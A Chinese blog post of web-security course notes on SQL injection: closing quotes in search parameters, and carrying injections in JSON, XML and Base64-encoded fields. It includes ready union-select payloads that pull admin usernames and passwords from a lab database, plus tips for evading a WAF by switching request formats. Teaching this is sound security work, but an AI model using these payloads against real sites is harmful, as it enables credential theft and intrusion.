Web攻防-SQL注入&数据类型&参数格式&JSON&XML&编码加密&符号闭合(小迪安全Day54学习笔记)

已于 2025-03-12 20:07:49 修改
阅读量766 收藏 11
点赞数 22
分类专栏: 小迪安全 文章标签: sql 安全 学习 网络安全 web安全
于 2025-03-12 20:02:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_59456817/article/details/146213452
版权

判断参数类型及格式

这节课的关键是认识这些特殊的格式也是个测试点,并且知道测试的参数应该写在哪个位置可以被触发

数字,字符,搜索

符号干扰:有无单引号或双引号及通配符等

例:

select * from news where id=$id;

select * from news where name=‘$name’;

select * from news where name like ‘%name%’;

借助自带的information_schema

SELECT id, title, created_at FROM news WHERE title LIKE ‘%1%’ OR content LIKE ‘%1%’ ORDER BY created_at DESC

SELECT id, title, created_at FROM news WHERE title LIKE ‘%1%’ order by#OR content LIKE ‘%1%’ ORDER BY created_at DESC

SELECT id, title, created_at FROM news WHERE title LIKE ‘%1%’ union select 1,2,3 #OR content LIKE ‘%1%’ ORDER BY created_at DESC

SELECT id, title, created_at FROM news WHERE title LIKE ‘%1%’ union select 1,database(),3 #OR content LIKE ‘%1%’ ORDER BY created_at DESC

1%’ union select 1,2,table_name from information_schema.tables where table_schema=‘news_db’#

1%’ union select 1,2,column_name from information_schema.columns where table_schema=‘news_db’ and table_name=‘admin’#

1%’ union select 1,username,password from admin#

image-20250311203123987

XML,JSON,编码,混合

json

{
    "news:"[
        {
            "id": 1,
            "title": "xiaodi",
            "content": "i am xiaodi",
            "created_at": "2025-03-07"
        },
        {
            "id": 2,
            "title": "xiaodisec",
            "content": "i am xiaodisec",
            "created_at": "2025-03-06"
        }
    ]
}

image-20250311204035161

“keyword”:“1%’ order by 3#” 正常访问

“keyword”:“1%’ order by 4#” 不正常访问

接下来就按照常规查询

在src中,碰到waf,会通过改变类型,将json格式改为xml格式

<root>
            <id>0</id>
            <keyword>1%' order by 3#</keyword>
        </root>

image-20250311210036600

具体接不接受要看对方的监控方式

// 获取 JSON 数据
$inputJSON = file_get_contents('php://input');
$input = json_decode($inputJSON, TRUE);

如果代码是这样的,必须为json提交,就绕过不了

总结:

  1. WAF 可能监控 JSON 格式的请求,并且你尝试通过 改变数据格式(比如从 JSON 改为 XML)来绕过。

  2. 如果目标服务器的代码逻辑 只能处理 JSON,那么即使绕过了 WAF,它依然不会解析 XML 数据。

    最终是否能绕过 WAF,要看对方的检测逻辑:

    如果 WAF 仅检测 JSON,那么可能可以绕过(前提是服务器能接受其他格式)。

    如果服务器严格要求 JSON,那么用 XML 提交无效,绕不过。

xml

<?xml version="1.0" encoding="UTF-8"?>
<news>
    <article>
        <id>1</id>
        <title>xiaodi</title>
        <content>i am xiaodi</content>
        <created_at>2025-03-07</created_at>
    </article>
    <article>
        <id>2</id>
        <title>xiaodisec</title>
        <content>i am xiaodisec</content>
        <created_at>2025-03-06</created_at>
    </article>
</news>

数据包

image-20250311212219573

抓包后写上注入语句为

       <data>
            <id>0</id>
            <keyword>1%' union select 1,username,password from admin#</keyword>
        </data>

xml也可以更改为json,同上

json+编码

image-20250311212619657

“id”:0,“keyword”:“MQ==”

如果可以通过修改id的值来查询用户的身份证信息,那么id本身也需要加密以防止篡改。

核心在于理解加密和查询的逻辑:通常,前端会先对id进行加密后再提交到服务器,服务器接收到数据后会解密,再去数据库中匹配对应的记录。

现在是知道是base64加密,

所以payload:1%’ union select 1,username,password from admin# 要加密后为

MSUnIHVuaW9uIHNlbGVjdCAxLHVzZXJuYW1lLHBhc3N3b3JkIGZyb20gYWRtaW4j

总结:

  • 由于加密是在前端完成的,解密算法通常也能在前端的JSON数据中找到,这意味着攻击者可能通过分析前端代码逆向解密过程,从而尝试获取敏感信息。

  • 加密编码工具是检测不了的,所以只能人工

  • 知道算法很重要,因为符合检验逻辑的payload就可以写出来了,就有了更多的选择

Python全栈(五)Web安全攻防之7.MySQL注入读写文件和HTTP头中的SQL注入
CUFEECR的博客
03-10 4610
pikachu是一个比较详细的漏洞平台;MySQL读取文件用load_file()函数;写入文件用into outfile。UPDATEXML()函数用于捕捉错误;在user-agent后加入payload进行user-agent注入;通过修改请求头中的referer进行SQL注入测试,可以通过3种方式进行安全测试;在请求头的cookie参数中加入payload‘进行cookie测试;使用Base64加密注入语句,插入到Cookie对应的位置完成SQL注入漏洞的探测。
【bWAPP】SQL注入实战
如果巅峰留不住,那就重走来时路
12-16 1600
我生来就是高山而非溪流 ,我欲于群峰之巅俯视平庸的沟壑。我生来就是人杰而非草芥,我站在伟人之肩藐视卑微的懦夫!
54天:Web攻防-SQL注入&数据类型&参数格式&JSON&XML&编码加密&符号闭合&复盘报告
wusaicyq的博客
03-10 953
在应用中,存在参数值为数字,字符时,符号的介入,另外搜索功能通配符的再次介入,另外传输数据可由最基本的对应赋值传递改为更加智能的XML或JSON格式传递,部分保证更安全的情况还会采用编码加密形式传递数据,给于安全测试过程中更大的挑战和难度。借助自带的information_schema.columns表(记录所有数据库名下的表名对应的列名信息)获取数据库名->表名->列名->数据(一般是关键数据,如管理员)2、Web攻防-SQL注入-XML&JSON&BASE64等。SRC报告-众测下的SQL注入挖掘。
53-WEB攻防SQL注入基础
m0_70346880的博客
03-21 524
摘录小安全
Web渗透-SQL注入
YangYubo091699的博客
08-05 2023
SQL注入
通杀! 熬夜码的 - 八万字 - 让你一文读懂SQL注入漏洞原理及各种场景利用
易编橙 · 终身成长社群,相遇已是上上签!
10-24 2908
WEB攻防漏洞的本质 漏洞特定函数: 漏洞的成因必然会涉及到所用的函数,不同的开发语言都有一些特定的函数用于不同的作用。 有些函数用于数据库查询,有的函数用于文件读写,有的函数用于调试输出等。函数在使用的时候会和漏洞形成的关系是什么? 漏洞产生的原因必定会使用到类似的脚本语言的特定函数,比如SQL注入漏洞,必然会涉及到数据库查询操作类的相关函数。 这就是漏洞的特定函数。所以在代码层,我们就可以通过函数猜解存在有那些漏洞,反推也可以根据漏洞猜解使用了哪些特定函数。 传输可
2020v6自学笔记web漏洞之sql注入
qq_36585338的博客
07-23 944
在本系列课程学习中,SQL 注入漏洞将是重点部分,其中 SQL 注入又非常复杂,区分各种数据库类型,提交方法,数据类型注入,我们需要按部就班的学习,才能学会相关 SQL 注入的核心。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。当进行 SQL 注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是 SQL 语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作,同时作为手工注入时,提前了解或预知其SQL 语句大概写法也能更好的选择对应的注入语句。
渗透测试-网络攻防面试题(非常全面,根据自己经验所写,长期更新)
weixin_46626737的博客
01-03 1665
10)mssql,orcale的一些特定函数和闭合方法---------------------------------------------------------------no------------------------------------------------------1)脏牛内核提权----------------------------------------------no----------------------------------------------
攻防世界-web高手进阶区
zji
04-25 6905
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
web做题记录(buuoj,jarvis,攻防世界,bugku,hackme)
热门推荐
CJB6988125的博客
11-19 1万+
web做题笔记 buuoj easy_tornado tornado是一个python写的web服务器 读取文件hint.txt:md5(cookie_secret+md5(filename)) 我们只要找到cookie_secret 就能读取任意文件 直接搜cve:找到一个\r\n分割请求的。。好像搞不到cookie_secret 找到error?msg=Error模板注入??? {{1.}}出...
攻防世界高手进阶区通关教程(2)
玄道的网安博客
05-16 2889
我们就直接开始吧 web2 源码给出了加密后的字符串,我们解密即可 代码块 import base64 def python_decode(string): zimu = "abcdefghijklmnopqrstuvwxyz" rot_13 ="" for i in string: if i.isdigit(): rot_13 += i else: try:
SQL 数值计算全解析:ABS、CEIL、FLOOR与ROUND函数深度精讲
Musennn的博客
05-21 395
ABS函数:获取绝对值,处理负数场景CEIL与FLOOR函数:掌握向上/向下取整的方向逻辑ROUND函数:精确控制小数位数,注意进位规则NULL值处理:使用COALESCE函数增强健壮性。
PL/SQL 安装配置与使用
是萝卜干呀的博客
05-20 685
PL/SQL 的安装配置、基础设置和使用;包和包体、存储过程的使用;存储过程的断点调试
SQL 多表关联与分组聚合:解密答题正确率分析
Musennn的博客
05-21 542
题目要求:计算浙江大学用户在不同难度题目下的答题正确率,并按正确率升序排序。关键分析点:假设各表结构及部分数据:user_profile:question_practice_detail:question_detail:预期结果: 2.2 关键技术点分解 1. 三表关联策略 作用: 通过关联用户与答题记录 通过关联答题记录与题目难度 选择内连接的原因: 仅统计实际答题的用户和题目 排除未答题用户或无难度信息的题目 2. 正确率计算逻辑 分子:统计正确答题数 分母:统计总答题数 ROUN
PostgreSQL初体验
Lemon__ing的博客
05-20 1074
一、基础定义与历史演进。
Ubuntu 20.04卸载并重装 PostgreSQL
最新发布
a_student_2020的博客
05-21 302
在 Ubuntu 系统中彻底卸载并重新安装 PostgreSQL 的步骤如下:首先,建议备份所有数据库数据。接着,停止 PostgreSQL 服务,使用 apt purge 命令卸载所有相关包,并手动删除配置和数据目录。清理系统后,更新包列表并重新安装 PostgreSQL 及其扩展,如 PostGIS 和 pointcloud。安装完成后,验证集群状态并启动服务。如果需要,可以恢复之前备份的数据。通过这些步骤,可以确保系统中安装了一个全新的 PostgreSQL 环境,适用于进一步的数据库操作和扩展使用。
安装PostgresSQL
2302_79420346的博客
05-20 926
数据库的oid和表的oid分别存放在pg_database,pg_class表中。逻辑上的对象编号,schema是依附于数据库而存在的。个User,每个Database以及Database中的所有对象都有它们的所有者:User。pg_default中,另一个是pg_global,存放的是整个实例数故据库所共享的系统表。数据库对象:这里包含了table,index,view,序列,函数等,数据最终存储。号的四字节整数,相关对象的oid都存放在相关的systemcatalog表中,比如。
ATT&amp;CK中文手册:全面网络安全攻防指南
这通常涉及对敏感数据的识别、选择和传输,攻击者可能会采取压缩、加密等手段以隐藏数据传输行为。 【标签】中提到的&quot;红蓝对抗&quot;是一种模拟攻防演练,其中&quot;红队&quot;扮演攻击者,&quot;蓝队&quot;扮演防守方,目的是提高网络安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值